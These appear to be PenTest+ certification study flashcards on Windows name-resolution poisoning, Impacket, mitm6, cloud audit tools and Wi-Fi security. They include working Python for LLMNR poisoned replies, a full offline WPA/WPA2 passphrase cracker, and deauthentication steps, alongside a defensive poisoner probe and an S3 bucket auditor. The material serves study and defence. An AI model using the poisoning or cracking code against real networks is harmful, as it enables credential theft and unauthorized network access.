PenTest+ Study Notes 9 Flashcards
??? is an on-path (man-in-the-middle) tool used to exploit name resolution on a Windows network. It listens for and poisons LLMNR and NBT-NS requests: when a host multicasts or broadcasts a query for a name that DNS could not resolve, ??? answers with the attacker's host IP as the name record, so the querying host opens a session (typically SMB or HTTP) with the attacker and hands over NTLM authentication material that can be relayed or cracked offline.
??? is the act of using multiple exploits to form a larger attack.
** Armitage / Cobalt Strike (learn these tools) **
Responder / Exploit chaining
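The poisoning described in the first card above, on the wire, as an added example (not Responder's own code): LLMNR reuses the DNS message format over UDP 5355 to multicast 224.0.0.252, so a poisoner only has to parse the question and send back an answer carrying the same transaction ID and its own IP. The last function is the defender's side of the same exchange, a canary query for a name that cannot exist, which is how you catch a poisoner on a segment. The names, transaction ID and attacker address are constructed for the example.

```python
import secrets
import socket
import struct

# LLMNR (RFC 4795) reuses the DNS wire format on UDP 5355, multicast 224.0.0.252.
LLMNR_MCAST = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1
FLAG_RESPONSE = 0x8000


def encode_name(name: str) -> bytes:
    """Encode 'fileshare01' as DNS labels: \\x0bfileshare01\\x00."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return out + b"\x00"


def decode_name(data: bytes, offset: int) -> tuple:
    """Decode labels starting at offset; returns (name, offset after the name)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if (length & 0xC0) == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            tail, _ = decode_name(data, pointer)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_llmnr_query(txid: int, name: str) -> bytes:
    """What a Windows host multicasts when DNS cannot resolve 'name'."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_llmnr_query(data: bytes) -> tuple:
    txid, flags, qdcount = struct.unpack("!HHH", data[:6])
    if flags & FLAG_RESPONSE or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, _ = decode_name(data, 12)
    return txid, name


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """The poisoner's reply: echo the question and add an A record -> attacker_ip.
    The transaction ID must match the query or the client discards the reply."""
    txid, name = parse_llmnr_query(query)
    header = struct.pack("!HHHHHH", txid, FLAG_RESPONSE, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    answer = (encode_name(name)
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_llmnr_response(data: bytes) -> tuple:
    """Return (txid, name, ip) from the first A record of a response."""
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", data[:8])
    if not flags & FLAG_RESPONSE or ancount < 1:
        raise ValueError("not an LLMNR response with answers")
    offset = 12
    for _ in range(qdcount):          # skip the echoed question section
        _, offset = decode_name(data, offset)
        offset += 4
    name, offset = decode_name(data, offset)
    rtype, _, _, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
    offset += 10
    if rtype != QTYPE_A or rdlen != 4:
        raise ValueError("first answer is not an A record")
    return txid, name, socket.inet_ntoa(data[offset:offset + 4])


def probe_for_poisoner(timeout: float = 2.0):
    """Defender's check: ask for a random name that cannot exist. Nobody should answer;
    whoever does is poisoning LLMNR on this segment. Returns (sender, advertised_ip)
    or None. Needs a live network, so it is not exercised by the offline checks."""
    name = "canary-" + secrets.token_hex(4)
    txid = secrets.randbits(16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_llmnr_query(txid, name), (LLMNR_MCAST, LLMNR_PORT))
        data, (src, _) = sock.recvfrom(512)
    except socket.timeout:
        return None
    finally:
        sock.close()
    got_txid, got_name, ip = parse_llmnr_response(data)
    if got_txid != txid or got_name.lower() != name:
        return None
    return src, ip


if __name__ == "__main__":
    query = build_llmnr_query(0x1234, "fileshare01")          # constructed query
    print(parse_llmnr_response(build_poisoned_response(query, "10.0.0.66")))
    print("poisoner on segment:", probe_for_poisoner())
```

The reply is unicast back to the querier's source port, which is why `probe_for_poisoner` can simply wait on the socket it sent from; a legitimate network never answers a query for a made-up name, so any reply is a finding in itself.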
??? is an open-source collection of Python classes and tools for working with network protocols, used heavily when pentesting a Windows environment. The ??? library provides the building blocks for attacks such as NTLM and Kerberos authentication attacks, pass the hash, credential dumping, and packet sniffing.
Impacket tools :
??? is an IPv6 DNS takeover tool. Windows hosts prefer IPv6 and send DHCPv6 solicitations even on IPv4-only networks, so ??? works by first replying to those DHCPv6 messages and setting the malicious actor as the hosts' DNS server. It then replies to DNS queries with bogus IP addresses that redirect the victim to another malicious host (commonly an NTLM relay).
mitm6 :
Exploit Database (Exploit DB) provides a large, searchable archive of public exploits and the vulnerable software they target. To search Exploit DB offline, the team can use SearchSploit, a tool included in the exploitdb package on Kali Linux.
??? are commonly referred to as buckets (AWS S3, Google Cloud Storage) or containers (Azure Blob Storage). A container is created within a specific region and cannot be nested within another container. Each container holds data objects, the equivalent of files in a local file system, and a container can also carry customizable metadata attributes.
Cloud storage containers :
Another vulnerable account is a shared account, which can exist when the password or another authentication credential is shared with more than one person. A shared account can be used in a small office home office (SOHO) environment, as many SOHO networking devices do not allow you to create multiple accounts. As a result, a single “Admin” account is used to manage the device. A shared account should be avoided, as it breaks the principle of nonrepudiation and makes an accurate audit trail difficult to establish.
In a direct-to-origin (D2O) attack, malicious actors circumvent the protection of a CDN or cloud-based DDoS mitigation service, which normally fronts the site and absorbs attack traffic, by discovering the origin server's network or IP address and then launching the attack directly against it.
info
??? is an open-source tool written in Python that can be used to audit instances and policies created on multicloud platforms, such as AWS, Microsoft Azure, and Google Cloud. ??? collects data from the cloud using API calls. It then compiles a report of all the objects discovered, such as VM instances, storage containers, IAM accounts, data, and firewall ACLs.
??? is an audit tool originally written for Amazon Web Services only (newer releases also cover Azure, Google Cloud and Kubernetes). It can be used to evaluate cloud infrastructure against the Center for Internet Security (CIS) benchmarks for AWS, plus additional GDPR and HIPAA compliance checks.
??? is designed as an exploitation framework to assess the security configuration of an AWS account. It includes several modules so the team can attempt exploits such as obtaining API keys or gaining control of a VM instance.
ScoutSuite / Prowler / Pacu
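What a ScoutSuite or Prowler storage check actually does with the API data it collects, as an added example that is not code from either project: evaluate each container's public-access-block settings, bucket policy and ACL for anonymous access, and its default encryption, then report findings per bucket. The inventory is constructed in the shape the S3 API returns (GetPublicAccessBlock, GetBucketPolicy, GetBucketAcl, GetBucketEncryption); bucket names, account ID and role are invented.

```python
import json

# Grantee URIs used by S3 canned ACLs; a grant to either one makes the bucket public.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
PAB_SETTINGS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def principal_is_everyone(principal) -> bool:
    """IAM policy principals that mean 'anyone': "*" or {"AWS": "*"} (also inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy: dict) -> list:
    """Allow statements open to everyone. Statements carrying a Condition are skipped on
    purpose: a condition (e.g. aws:SourceVpce) may restrict access, and deciding that
    needs full policy evaluation rather than principal matching."""
    hits = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if (stmt.get("Effect") == "Allow" and "Condition" not in stmt
                and principal_is_everyone(stmt.get("Principal"))):
            hits.append(stmt.get("Sid", f"statement[{i}]"))
    return hits


def evaluate_bucket(bucket: dict) -> list:
    """Run the checks against one bucket record; return a list of finding strings."""
    findings = []
    pab = bucket.get("PublicAccessBlock", {})
    missing = [s for s in PAB_SETTINGS if not pab.get(s)]
    if missing:
        findings.append("public access block incomplete: " + ", ".join(missing))
    for sid in public_policy_statements(bucket.get("Policy", {})):
        findings.append(f"bucket policy {sid} grants access to everyone")
    for grant in bucket.get("ACL", {}).get("Grants", []):
        group = PUBLIC_GRANTEES.get(grant.get("Grantee", {}).get("URI", ""))
        if group:
            findings.append(f"ACL grants {grant.get('Permission')} to {group}")
    if not bucket.get("DefaultEncryption"):
        findings.append("no default server-side encryption configured")
    return findings


def audit(inventory: list) -> dict:
    """Map bucket name -> findings, listing only buckets that have at least one."""
    report = {}
    for bucket in inventory:
        findings = evaluate_bucket(bucket)
        if findings:
            report[bucket["Name"]] = findings
    return report


# Constructed inventory (not a real account): one hardened bucket, one exposed one.
SAMPLE_INVENTORY = [
    {
        "Name": "corp-backups-prod",
        "Region": "us-east-1",
        "PublicAccessBlock": dict.fromkeys(PAB_SETTINGS, True),
        "Policy": {"Statement": [{"Sid": "AllowBackupRole", "Effect": "Allow",
                                  "Principal": {"AWS": "arn:aws:iam::123456789012:role/backup"},
                                  "Action": "s3:PutObject",
                                  "Resource": "arn:aws:s3:::corp-backups-prod/*"}]},
        "ACL": {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner"},
                            "Permission": "FULL_CONTROL"}]},
        "DefaultEncryption": "aws:kms",
    },
    {
        "Name": "marketing-assets",
        "Region": "eu-west-1",
        "PublicAccessBlock": {"BlockPublicAcls": True, "IgnorePublicAcls": False,
                              "BlockPublicPolicy": False, "RestrictPublicBuckets": False},
        "Policy": {"Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                                  "Action": "s3:GetObject",
                                  "Resource": "arn:aws:s3:::marketing-assets/*"}]},
        "ACL": {"Grants": [{"Grantee": {"Type": "Group",
                                        "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                            "Permission": "READ"}]},
        "DefaultEncryption": None,
    },
]

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_INVENTORY), indent=2))
```

The conservative handling of conditioned statements is deliberate: a scanner that flags every `Principal: "*"` drowns the report in false positives from VPC-endpoint or IP-restricted policies, while one that ignores them all misses genuinely public buckets; reporting unconditioned ones and leaving the rest for manual review is the usual compromise.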
??? is an open-source cloud security, governance, and management tool designed to help the administrator create policies based on resource types. When run, you’ll be able to see which resources will leave you vulnerable then enforce policies to automatically correct the vulnerabilities.
??? can: notify users in real time if mistakes are made; ensure compliance in terms of encryption, access requirements, and backups; shut resources down during off hours and manage garbage collection. In addition, you can apply specific actions, such as stopping or terminating non-compliant resources, based on the filters you set.
Cloud custodian :
??? features the Temporal Key Integrity Protocol (TKIP). TKIP dynamically derives a new 128-bit key for each packet by mixing the temporal key with the sender's MAC address and a packet sequence counter. In addition, ??? includes a Message Integrity Check (MIC), which provides a stronger method than a CRC to ensure data integrity.
??? is an improvement on WPA that replaced RC4 and TKIP with Counter Mode CBC-MAC Protocol (CCMP) using AES.
??? includes advanced features to secure wireless transmissions, such as a 192-bit security suite when using ???-Enterprise mode (used in business LANs). It also features improved authentication (Simultaneous Authentication of Equals in place of the PSK handshake), employs a 48-bit initialization vector, and uses Protected Management Frames (PMFs) to prevent exposure of management traffic.
WPA / WPA2 / WPA3
Deauth : use airodump-ng on the target channel to capture traffic and wait for a WPA handshake; with aireplay-ng you can deauthenticate either a single client or all clients on a WAP, forcing them to reconnect and repeat the 4-way handshake so that it can be captured.
Jamming is an attack that disrupts a Wi-Fi signal by broadcasting on the same frequency as the target WAP, and any signals that a wireless transceiver is attempting to send or receive will be blocked. Physical jamming devices can send disruptive signals to several wireless devices in a targeted area. By jamming a Wi-Fi signal, a malicious actor can trigger a denial of service (DoS) and disrupt the flow of communications.
To launch a jamming attack, a malicious actor can use either a physical device or a software jammer. For example, wifijammer is a Python script that can jam (or disrupt) the signals of all WAPs in an area. You can also use wifijammer to perform more targeted attacks that disable only selected Wi-Fi networks in an area, or even specific clients.
info
WPA/WPA2 : the handshake does not carry the password itself, but it carries a MIC computed from a key derived from the passphrase and the SSID. If you have captured the 4-way handshake, you can therefore use dictionary-based and brute-force methods to try to recover the passphrase offline.
When using WPA, the use of rotating keys and sequence numbers can make a cracking attempt more difficult. However, WPA is still susceptible to dictionary attacks if a weak passkey has been chosen. When using WPA2, an attack might be possible by launching a key reinstallation attack (KRACK), which intercepts and manipulates the WPA2 4-way handshake (replaying message 3 so the client reinstalls the key and reuses nonces).
info
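The offline attack described in the WPA/WPA2 cards above, carried through, as an added example that is not code from the page or from aircrack-ng: derive PMK = PBKDF2-HMAC-SHA1(passphrase, SSID) and PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces) for each candidate, recompute the MIC of EAPOL message 2 with the PTK's first 16 bytes (the KCK), and stop when it matches the captured one. The capture is constructed inside the block: the SSID, passphrase, MAC addresses and nonces are invented, and the message 2 MIC is forged with the "secret" passphrase exactly as a real client would have computed it.

```python
import hashlib
import hmac
import struct

# Offsets inside an EAPOL-Key frame (4-byte EAPOL header followed by the key descriptor).
KEY_INFO_OFF = 5      # 2 bytes of flags; low 3 bits = key descriptor version
NONCE_OFF = 17        # 32-byte nonce (SNonce in message 2)
MIC_OFF = 81          # 16-byte MIC
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes, key_version: int) -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed. Version 1 (TKIP) is
    HMAC-MD5, version 2 (CCMP) is HMAC-SHA1 truncated to 128 bits. Version 3
    (AES-128-CMAC, used with 802.11w/WPA3) is not handled here."""
    if key_version == 1:
        return hmac.new(kck, frame_mic_zeroed, hashlib.md5).digest()
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:MIC_LEN]


def split_mic(frame: bytes):
    """Return (frame with MIC zeroed, captured MIC)."""
    mic = frame[MIC_OFF:MIC_OFF + MIC_LEN]
    zeroed = frame[:MIC_OFF] + b"\x00" * MIC_LEN + frame[MIC_OFF + MIC_LEN:]
    return zeroed, mic


def crack_psk(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline dictionary attack: PMK -> PTK -> KCK per candidate, compare the MIC."""
    zeroed, mic = split_mic(msg2)
    key_version = struct.unpack("!H", msg2[KEY_INFO_OFF:KEY_INFO_OFF + 2])[0] & 0x7
    snonce = msg2[NONCE_OFF:NONCE_OFF + 32]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, key_version), mic):
            return candidate
    return None


# --- constructed handshake standing in for a pcap (all values invented) ---
SSID = "CorpGuest"
SECRET_PASSPHRASE = "Summer2023!"          # what the attacker is trying to recover
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))                  # taken from message 1
SNONCE = bytes(range(32, 64))              # taken from message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """EAPOL-Key message 2 of 4: descriptor type 2 (RSN), key info 0x010a
    (version 2, pairwise, MIC bit), SNonce, zeroed IV/RSC/ID, then the RSN IE."""
    body = (struct.pack("!BHH", 2, 0x010A, 0)
            + (1).to_bytes(8, "big")            # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + mic + struct.pack("!H", len(RSN_IE)) + RSN_IE)
    return struct.pack("!BBH", 2, 3, len(body)) + body   # EAPOL v2, type 3 = EAPOL-Key


def forge_capture() -> bytes:
    """Produce message 2 with the MIC a real client would send for SECRET_PASSPHRASE."""
    pmk = pmk_from_passphrase(SECRET_PASSPHRASE, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE), 2))


if __name__ == "__main__":
    capture = forge_capture()
    print(crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, capture,
                    ["password", "letmein", "Summer2023!"]))
```

Everything the attacker needs is in the capture: the SSID (beacon or probe response), both MAC addresses, the ANonce from message 1, and the SNonce, key-info flags and MIC from message 2. The cost per guess is the 4096-round PBKDF2, which is what makes long random passphrases survive this attack and short dictionary words fall to it; a mis-ordered MAC/nonce pair or a MIC computed over the wrong bytes produces no match for the right passphrase either, so verifying the pipeline against a known-good capture before a long run is worth the minute it takes.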